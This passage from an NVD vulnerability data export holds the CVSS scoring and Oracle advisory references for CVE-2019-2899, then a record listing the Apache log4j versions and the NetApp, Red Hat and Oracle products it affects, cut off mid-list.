Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], id: "CVE-2019-2899", lastModified: "2024-11-21T04:41:45.893", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "NONE", baseScore: 3.5, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:S/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, exploitabilityScore: 0.9, impactScore: 1.4, source: "secalert_us@oracle.com", type: "Secondary", }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.1", }, exploitabilityScore: 0.9, impactScore: 1.4, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-10-16T18:15:27.247", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ 
"Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "A364B542-9D74-48AD-9616-8F16107B3F9C", versionEndExcluding: "2.8.2", versionStartIncluding: "2.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", matchCriteriaId: "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", matchCriteriaId: "F1BE6C1F-2565-4E97-92AA-16563E5660A5", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", matchCriteriaId: "7081652A-D28B-494E-94EF-CA88117F23EE", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", matchCriteriaId: "7B7A6697-98CC-4E36-93DB-B7160F8399F9", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", matchCriteriaId: "077732DB-F5F3-4E9C-9AC0-8142AB85B32F", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", matchCriteriaId: "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", matchCriteriaId: "84FF61DF-D634-4FB5-8DF1-01F631BE1A7A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", matchCriteriaId: "B99A2411-7F6A-457F-A7BF-EB13C630F902", vulnerable: true, }, { criteria: 
"cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", matchCriteriaId: "041F9200-4C01-4187-AE34-240E8277B54D", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", matchCriteriaId: "4EB48767-F095-444F-9E05-D9AC345AB803", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", matchCriteriaId: "5F6FA12B-504C-4DBF-A32E-0548557AA2ED", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", matchCriteriaId: "33C068A4-3780-4EAB-A937-6082DF847564", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", matchCriteriaId: "51EF4996-72F4-4FA4-814F-F5991E7A8318", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "D99A687E-EAE6-417E-A88E-D0082BC194CD", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "B353CE99-D57C-465B-AAB0-73EF581127D1", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "9EC0D196-F7B8-4BDD-9050-779F7A7FBEE4", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", matchCriteriaId: "A4E9DD8A-A68B-4A69-8B01-BFF92A2020A8", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "BF77CDCF-B9C9-427D-B2BF-36650FB2148C", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", matchCriteriaId: "D5F7E11E-FB34-4467-8919-2B6BEAABF665", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", matchCriteriaId: "B76AA310-FEC7-497F-AF04-C3EC1E76C4CC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", matchCriteriaId: "825ECE2D-E232-46E0-A047-074B34DB1E97", vulnerable: true, }, ], negate: false, 
operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "A5553591-073B-45E3-999F-21B8BA2EEE22", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6FAA9FFE-8F55-4E81-B62F-A5500468AD30", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C41B952C-B6FD-4244-BEEE-A1EB73503594", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "3D8D08B8-CE61-45A3-BAC2-6D0E7D567B68", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "C83DA9A0-2EBC-4298-8412-1A7C4DC88C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9DC56004-4497-4CDD-AE76-5E3DFAE170F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "274A0CF5-41E8-42E0-9931-F7372A65B9C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", matchCriteriaId: "66DCCCD9-2170-4675-A447-FB679BC28A74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", 
matchCriteriaId: "FD945A04-174C-46A2-935D-4F92631D1018", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:*", matchCriteriaId: "9D5F8F04-7DFB-4B44-90CF-F1372DB8313C", versionEndIncluding: "6.2", versionStartIncluding: "6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:*:*:*:*:*:*:*:*", matchCriteriaId: "A53B6FD8-8367-4915-B4D0-23572F31C539", versionEndExcluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:*:*:*:*:*:*:*:*", matchCriteriaId: "ABD748C9-24F6-4739-9772-208B98616EE2", versionEndIncluding: "7.3.6", versionStartIncluding: "7.3.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", matchCriteriaId: "15817206-C2AD-47B7-B40F-85BB36DB4E78", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:11.1:*:*:*:*:*:*:*", matchCriteriaId: "F6C9F582-6C82-4994-9724-22E9575E48B0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0:*:*:*:*:*:*:*", matchCriteriaId: "49BB6E9C-B630-4BDC-AEC1-7F031F612D6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_service_broker:6.0:*:*:*:*:*:*:*", matchCriteriaId: "373C4024-679F-4C37-B408-0FB0D7FD845F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "77120A3C-9A48-45FC-A620-5072AF325ACF", versionEndExcluding: "7.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.2:*:*:*:*:*:*:*", matchCriteriaId: "8A76F09D-AF43-426B-A04F-79E1CAC51D03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.5:*:*:*:*:*:*:*", matchCriteriaId: "F5B5E83F-D4FD-4ABB-9B8E-97C0E7571AA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: 
"9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "36CF85A9-2C29-46E7-961E-8ADD0B5822CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: "36E39918-B2D6-43F0-A607-8FD8BFF6F340", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "1FEB8446-7EAC-4A8D-B6EE-3AAC2294C324", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: "14480702-4398-4C28-82A6-E7329FB3B650", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6F4E0F9A-D925-43FB-A1B7-452EEAE6BE2D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:*:*:*:*:*:*:*:*", matchCriteriaId: "C2239009-34CE-4E54-992B-835649C9D96F", versionEndIncluding: "13.2.2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:12.1.0.8:*:*:*:*:*:*:*", matchCriteriaId: "41650E24-8BFD-42F0-A3E2-545118602690", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "C5AFC807-4873-42B3-AEDE-8633A9BDDEF2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "2E3D0D69-6AFF-49DD-9BB4-5C0C6905D14E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "532955A8-7292-4662-9324-C961587C8657", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "6E3469D7-69E4-4242-B45A-C0CD9E691C4A", versionEndIncluding: "7.3.3.0.2", versionStartIncluding: 
"7.3.3.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "1D94C05C-7403-47D3-98D8-2DA8373FEE6F", versionEndIncluding: "8.0.7.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "46E31100-478A-480C-9518-A6D8FBB94B8B", versionEndIncluding: "8.0.4.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:6.1.1:*:*:*:*:*:*:*", matchCriteriaId: "48D8CC72-A67A-4CB0-948D-53488ACC7826", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "8DECBF5C-6C87-424F-A116-DD534EC5946C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "3469C84E-50F3-4461-864C-E59174DDC981", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_lending_and_leasing:*:*:*:*:*:*:*:*", matchCriteriaId: "2959030B-A9B7-4423-A2E8-9352FC83C4A2", versionEndIncluding: "14.8.0", versionStartIncluding: "14.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_lending_and_leasing:12.5.0:*:*:*:*:*:*:*", matchCriteriaId: "317CA916-61F3-4E24-B42F-610A1C88A5BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "4E7791EF-A99D-4D52-AFC7-157372E88E21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "265B796B-2DDA-43A6-A3A9-1A79676F25C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: 
"D4279644-04B8-4E58-A38D-CD1E4FB1C39C", versionEndIncluding: "8.0.7.0.0", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:6.1.1:*:*:*:*:*:*:*", matchCriteriaId: "43422E17-1D41-497E-A60B-31B1B4D6D563", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0:*:*:*:*:*:*:*", matchCriteriaId: "C9C146BA-6F4F-4A6F-8E53-8A4F5B8E15D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.0.4:*:*:*:*:*:*:*", matchCriteriaId: "B0A34DF8-72CC-4A8E-84F2-C2DF4A0B9FAB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "21BE77B2-6368-470E-B9E6-21664D9A818A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", matchCriteriaId: "3250073F-325A-4AFC-892F-F2005E3854A5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "0DDDC9C2-33D6-4123-9ABC-C9B809A6E88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "991A279B-9D7C-4E39-8827-BC21C2C03B83", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.2:*:*:*:*:*:*:*", matchCriteriaId: "D151B58F-5583-4F19-B225-80075B45441B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3:*:*:*:*:*:*:*", matchCriteriaId: "C7D665C9-408A-4039-A2D4-9EE565BC4656", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate:12.3.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "65B765DA-560B-4367-B9B0-B7369BC4D3DC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "CECECC34-8112-4328-BA49-39F30BE7874A", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:identity_analytics:11.1.1.5.8:*:*:*:*:*:*:*", matchCriteriaId: "B4855252-D6CA-461D-B196-30AFA7482868", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:11.1.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "7A79A489-F37C-420A-83B1-4482A8DFF9BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", matchCriteriaId: "E8BD581B-1CC0-4236-836A-204BBCBBBF77", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "16BBC649-7AA8-4B8E-9A3F-CC62948F0102", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "289702F6-1CC4-4D88-9745-EB0FA68A732B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:*:*:*:*:*:*:*:*", matchCriteriaId: "9A74FD5F-4FEA-4A74-8B92-72DFDE6BA464", versionEndIncluding: "17.3", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", matchCriteriaId: "CEE4B2F0-1AAB-4A1F-AE86-A568D43891B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", matchCriteriaId: "C79B50C2-27C2-4A9C-ACEE-B70015283F58", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", matchCriteriaId: "9ED4F724-C92F-4B4F-B631-81A4EA706DB2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", matchCriteriaId: "900450EB-A71D-4A8E-B8C4-AFD36F9A36B0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", matchCriteriaId: "68017B52-6597-4E32-A38F-634B5635568C", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", matchCriteriaId: "A19D11A6-BA1D-4121-8686-C177C450777F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", matchCriteriaId: "DB6321F8-7A0A-4DB8-9889-3527023C652A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", matchCriteriaId: "25F8E604-8180-4728-AD2D-7FF034E3E65A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", matchCriteriaId: "02867DC7-E669-43C0-ACC4-E1CAA8B9994C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", matchCriteriaId: "FBAFA631-C92B-4FF7-8E65-07C67789EBCD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", matchCriteriaId: "9652104A-119D-4327-A937-8BED23C23861", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A055CAA6-F789-4E63-A212-84DBAC4BF044", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "48D04F3B-A385-4D8C-BD05-53006452346A", versionEndIncluding: "3.4.7.4297", versionStartIncluding: "3.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: 
"4424C7C9-508B-4824-91A7-AFA1D8C8C698", versionEndIncluding: "4.0.4.5235", versionStartIncluding: "4.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "BFFFF50D-D301-4752-B720-4340C69E2A98", versionEndIncluding: "8.0.0.8131", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", matchCriteriaId: "B21E71BD-DD38-4634-BF9F-092D55000DE6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "9D8B3B57-73D6-4402-987F-8AE723D52F94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "62BF043E-BCB9-433D-BA09-7357853EE127", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "3F26FB80-F541-4B59-AC3C-633F49388B59", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.0:*:*:*:*:*:*:*", matchCriteriaId: "07EB8080-B6DE-47F4-B978-F56AEF7294BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.1:*:*:*:*:*:*:*", matchCriteriaId: "0AE52320-14DB-4BD5-A1E5-6BBE4829923A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "2C0B5E4B-BA35-4949-B7EC-70C5F5E44FD8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.3:*:*:*:*:*:*:*", matchCriteriaId: "165E98B6-9ADA-46A7-92C0-E3624D6D89C5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.4:*:*:*:*:*:*:*", matchCriteriaId: "092C9E61-8A0A-4348-A423-A9312D7D330F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.5:*:*:*:*:*:*:*", matchCriteriaId: "01949739-F799-47FE-9118-617F84903F70", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.6:*:*:*:*:*:*:*", matchCriteriaId: "34FAA06A-F092-452A-B35C-BC133834DA59", vulnerable: 
true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.7:*:*:*:*:*:*:*", matchCriteriaId: "B8A9A0D5-95B9-47BB-8303-03D40DE46678", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.8:*:*:*:*:*:*:*", matchCriteriaId: "F071925B-7B0A-4250-9A25-1221711453FF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.9:*:*:*:*:*:*:*", matchCriteriaId: "93CF9B92-309E-4356-B8C1-CB161A712479", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.10:*:*:*:*:*:*:*", matchCriteriaId: "2CBCA717-6B8B-4CAF-8E9C-57335925CE2F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "8FFEC4A8-E000-4921-8563-5BC3B0DC6C5B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "DDB7DE72-2E0D-427D-AF1E-2BC068D0756B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "4C64A19B-BC3D-4C84-AE38-75EEAE3B5BEA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.0:*:*:*:*:*:*:*", matchCriteriaId: "5825956B-B0DD-4083-8E50-B8148F9F438E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.1:*:*:*:*:*:*:*", matchCriteriaId: "691A45D3-A594-4E95-9894-87B9FD6BE833", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "2F36C640-592C-4081-8B97-2432BF7DD1F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.3:*:*:*:*:*:*:*", matchCriteriaId: "C477753B-2716-4266-815B-5BABDDFE1FDA", vulnerable: true, }, { criteria: 
